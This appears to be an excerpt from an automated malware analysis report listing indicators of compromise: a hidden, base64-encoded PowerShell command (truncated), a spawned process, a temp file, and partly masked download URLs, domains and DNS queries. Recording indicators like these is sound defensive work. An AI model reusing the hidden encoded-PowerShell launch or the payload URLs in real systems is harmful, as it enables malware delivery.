Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABGAGwAeAByAGgAYwBmAGQAPQAnAEEAZQBwAG8AcQBhAHcAcABjAHkAcgBrACcAOwAkAFYAdwBnAHkAbwBzAGwAcwBzAGgAbgBzACAAPQAgACcANwA3ACcAOwAkAFMAbwByAHcAeAB1AHUAcQBzAD0AJwBXAHQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1464
- %TEMP%\867225.cvr
- 'qu#####sencialghero.com':80
- 'qu#####sencialghero.com':443
- 'er###ontia.com':80
- 'ne#.###.netmessage.net':80
- http://www.qu#####sencialghero.com/doc/7jh1-9rlrb4j4w-6761362525/
- http://www.er###ontia.com/backup/rYkTRwX/
- http://er###ontia.com/backup/rYkTRwX/
- http://ne#.###.netmessage.net/sdlkitj8kfd/zpKHTt/
- 'qu#####sencialghero.com':443
- DNS ASK qu#####sencialghero.com
- DNS ASK er###ontia.com
- DNS ASK ne#.###.netmessage.net
- DNS ASK pr#####ionalfriends.in
- DNS ASK co###vents.in